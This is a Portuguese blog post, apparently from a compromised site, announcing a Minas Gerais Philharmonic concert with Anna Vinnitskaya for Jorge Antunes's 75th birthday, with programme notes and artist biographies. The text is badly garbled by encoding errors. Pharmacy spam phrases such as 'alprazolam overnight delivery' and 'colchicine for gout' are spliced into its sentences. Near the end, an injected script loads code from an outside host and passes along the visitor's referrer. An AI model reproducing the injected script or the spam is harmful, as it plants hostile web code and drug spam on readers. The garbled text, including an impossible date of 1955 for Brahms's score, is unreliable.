Minas GeraisMúsica contemporâneaMúsica sinfônicaProgramação

ParabA�ns, Jorge Antunes

FilarmA?nica de Minas Gerais recebe pianista Anna Vinnitskaya para comemorar 75 anos do compositor Jorge Antunes.

 

Uma das grandes pianistas da atualidade, Order Anna Vinnitskaya se apresenta com a Orquestra FilarmA?nica de Minas Gerais nos dias 18 e 19 de maio, A�s 20h30, na Sala Minas Gerais, em Belo Horizonte. No repertA?rio, o Concerto para piano n. 1, de BartA?k, a Sinfonia n. 1 em dA? menor, de Brahms, e Apoteose de Rousseau, de Jorge Antunes, em comemoraA�A?o aos 75 anos do compositor brasileiro. A regA?ncia A� do maestro Fabio Mechetti.

Antes das apresentaA�A�es, das 19h30 A�s 20h, o pA?blico poderA? participar dos Concertos Comentados, palestras que abordam aspectos do repertA?rio. O convidado das duas noites serA? o professor de regA?ncia coral da Escola de MA?sica da UFMG e regente e diretor artA�stico dos Coros Madrigale e BDMG, Arnon de Oliveira, que falarA? sobre a obra e a vida dos compositores BartA?k e Brahms.

 

RepertA?rio

Jorge Antunes (1942-) e a obra Apoteose de Rousseau Order
Formado em FA�sica, Violino, ComposiA�A?o e RegA?ncia, Antunes A� precursor da mA?sica eletroacA?stica no paA�s e ocupa, desde 1994, a cadeira nA?mero 22 da Academia Brasileira de MA?sica. Combativo, o compositor enxerga a arte como possibilidade de luta por um mundo mais justo. No poema sinfA?nico Apoteose de Rousseau Pills (2014), encena-se a disputa sonora entre melodia e harmonia a�� temA?tica a opor Jean-Philippe Rameau (1683-1764), partidA?rio das expressA�es harmA?nicas como imitaA�A�es da natureza, e Jean-Jacques Rousseau (1712-1778), defensor da melodia como representante da natureza. Em sua obra, Antunes toma partido de Rousseau. Nela, ouvem-se melodias diatA?nicas, alA�m de vasta riqueza de timbres orquestrais. AlA�m disso, o poema oscila entre harmonias densas e sonoridades delicadas, com estruturas tonais e atonais, citaA�A�es estilA�sticas barrocas, clA?ssicas, romA?nticas e uma melodia modal tradicional. A obra A� atual, moderna e de grande forA�a expressiva.

BA�la BartA?k (1881-1945) e a obra Concerto para piano n. 1
Grande pianista, BartA?k pesquisou manifestaA�A�es musicais populares de sua terra natal, assim como do Leste europeu, do Norte da A?frica e da Turquia. Seu mA�todo de trabalho implicava o respeito A�tico pelas etnias e a superioridade do humanismo sobre o nacionalismo. Assimilou, assim, a riqueza rA�tmica do folclore e se libertou da hegemonia do sistema tonal. Paralelamente A�s pesquisas de etnomusicologia, o compositor elaborou original sA�ntese de enfoques do cA?none da mA?sica ocidental. Desse modo, contribuiu com a renovaA�A?o da linguagem musical contemporA?nea. No Concerto n. 1 (1926), triunfam aspectos percussivos do a�?pianismoa�? do compositor: sonoridades violentas, agregaA�A�es de A?speros blocos, ao invA�s de acordes tradicionais, e um mecanicismo insistente. Trata-se de resposta bastante pessoal a�� e, ainda hoje, muito impactante a�� aos apelos neoclA?ssicos e construtivistas de sua A�poca.

Order Johannes Brahms (1833-1897) e a obra Sinfonia n. 1 em dA? menor, Op. 68
Quando se fixou em Viena, em 1862, Brahms jA? era aclamado como a�?herdeiro de Beethovena�?. Importantes mA?sicos da A�poca consideravam-no a figura emblemA?tica do movimento de reaA�A?o A� a�?mA?sica do futuroa�?, preconizada pelos poemas sinfA?nicos de Liszt e pelo drama musical wagneriano. A� provA?vel, aliA?s, que o receio da comparaA�A?o direta com o legado beethoveniano tenha relaA�A?o com a demora para estreia de sua primeira sinfonia: a partitura foi elaborada de 1955 a 1876. A Primeira (1855/1876) A� uma obra pessoal, em que se dosam a inteligA?ncia, a variedade de recursos e os elementos de contraste, como o uso de tonalidades e compassos diferentes para cada andamento. O compositor limitou-se A� orquestra usada por Beethoven na Nona Sinfonia e conseguiu cores e planos sonoros originais: sutilezas rA�tmicas, mudanA�as de acentuaA�A?o, ruptura da regularidade de compassos, fragmentaA�A�es e inversA�es.

 

Artistas

Anna_Vinnitskaya (foto de Gela Megrelidze)

As gravaA�A�es e apresentaA�A�es de alprazolam overnight delivery Anna Vinnitskaya renderam muitos elogios da crA�tica e do pA?blico. Nascida em Novorossiysk, na RA?ssia, a pianista vive em Hamburgo desde 2002. Atualmente, A� professora no ConservatA?rio de Hamburgo, onde se formou sob orientaA�A?o de Evgeni Koroliov. O repertA?rio de Vinnitskaya vai de Johann Sebastian Bach a Sofia Gubaidulina. Suas escolhas enfatizam os grandes compositores russos para piano, como Rachmaninov, Prokofiev e Shostakovich, bem como Ravel, Debussy e Chopin. Suas leituras de Brahms e BartA?k chamaram a atenA�A?o, a exemplo da apresentaA�A?o dos trA?s concertos de BartA?k em uma tarde, com a Rundfunk-Sinfonieorchester Berlin, sob direA�A?o de Marek Janowski. A musicista A� celebrada por pA?blico e crA�tica por sua habilidade em pintar grandes paisagens sonoras e, tambA�m fazer interpretaA�A�es incendiA?rias.

Vinnitskaya esteve com renomadas orquestras, de Berlim (Deutsches Symphonie-Orchester) a Londres (Royal Philharmonic Orchestra); de Munique (MA?nchner Philharmoniker) a TA?quio (NHK Orchestra). Colaborou com os regentes Andris Nelsons, Kirill Petrenko, Krzysztof Urbanski, Charles Dutoit, Vladimir Fedoseyev e Marek Janowski. Suas gravaA�A�es receberam vA?rios prA?mios, como Diapason da��Or, Escolha do Editor da Gramophone e Echo Klassik. Dentre as premiaA�A�es de maior prestA�gio, estA?o a CompetiA�A?o Busoni (ItA?lia, 2005), o primeiro lugar no Concurso Rainha Elisabeth (BA�lgica, 2007), e o prA?mio Leonard Bernstein, no Festival Schleswig-Holstein (Alemanha, 2008). Na temporada 2016/2017, como solista em residA?ncia na WDR Sinfonieorchester, apresentarA? e gravarA? concertos de BartA?k com o regente principal da orquestra, Jukka-Pekka Saraste.

 

Desde 2008, Fabio Mechetti A� diretor artA�stico e regente titular da Orquestra FilarmA?nica de Minas Gerais. Com seu trabalho, Mechetti posicionou a orquestra mineira nos cenA?rios nacional e internacional e conquistou vA?rios prA?mios. Com ela, realizou turnA?s pelo Uruguai e Argentina e realizou gravaA�A�es para o selo Naxos. Natural de SA?o Paulo, serviu recentemente como regente principal da Orquestra FilarmA?nica da MalA?sia, tornando-se o primeiro regente brasileiro a ser titular de uma orquestra asiA?tica. Depois de 14 anos A� frente da Orquestra SinfA?nica de Jacksonville, Estados Unidos, atualmente A� seu regente titular emA�rito. Foi tambA�m regente titular da SinfA?nica de Syracuse e da SinfA?nica de Spokane. Desta A?ltima A�, agora, regente emA�rito. Foi regente associado de Mstislav Rostropovich na Orquestra SinfA?nica Nacional de Washington e com ela dirigiu concertos no Kennedy Center e no CapitA?lio norte-americano. Da Orquestra SinfA?nica de San Diego, foi regente residente. Fez sua estreia no Carnegie Hall de Nova York conduzindo a Orquestra SinfA?nica de Nova Jersey e tem dirigido inA?meras orquestras norte-americanas, como as de Seattle, Buffalo, Utah, Rochester, Phoenix, Columbus, entre outras. A� convidado frequente dos festivais de verA?o nos Estados Unidos, entre eles os de Grant Park em Chicago e Chautauqua em Nova York.

Realizou diversos concertos no MA�xico, Espanha e Venezuela. No JapA?o dirigiu as orquestras sinfA?nicas de TA?quio, Sapporo e Hiroshima. Regeu tambA�m a Orquestra SinfA?nica da BBC da EscA?cia, a Orquestra da RA?dio e TV Espanhola em Madrid, a FilarmA?nica de Auckland, Nova ZelA?ndia, e a Orquestra SinfA?nica de Quebec, CanadA?. Vencedor do Concurso Internacional de RegA?ncia Nicolai Malko, na Dinamarca, Mechetti dirige regularmente na EscandinA?via, particularmente a Orquestra da RA?dio Dinamarquesa e a de Helsingborg, SuA�cia. Recentemente fez sua estreia na FinlA?ndia, dirigindo a FilarmA?nica de Tampere, e na ItA?lia, dirigindo a Orquestra SinfA?nica de Roma. Em 2016 estreou com a FilarmA?nica de Odense, na Dinamarca.

Igualmente aclamado como regente de A?pera, estreou nos Estados Unidos dirigindo a A�pera de Washington. No seu repertA?rio destacam-se produA�A�es de Tosca, Turandot, Carmem, Don Giovanni price mycelex-g , CosA� Fan Tutte, La BohA?me, Madame Butterfly, how much colchicine for gout O Barbeiro de Sevilha, La Traviata e Otello. Fabio Mechetti recebeu tA�tulos de mestrado em RegA?ncia e em ComposiA�A?o pela prestigiosa Juilliard School de Nova York.

 

Foto do post: Daiane Souza

 

SERVIA�O:

 

Orquestra FilarmA?nica de Minas Gerais

Anna Vinnitskaya, piano

Fabio Mechetti, regA?ncia

 

18 e 19 de maio, quinta e sexta-feira, A�s 20h30 Pills

Sala Minas Gerais (R. Tenente Brito Melo, 1.090, Barro Preto a�� Belo Horizonte. Tel.: 31 3219-9000)

 

Ingressos: R$ 105 (balcA?o principal), R$ 85 (plateia central), R$ 62 (balcA?o lateral), R$ 50 (mezanino) e R$ 40 (balcA?o palco e coro), com meia-entrada para estudantes, pessoas com mais de 60 anos, jovens de baixa renda e pessoas com deficiA?ncia, de acordo com a legislaA�A?o

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.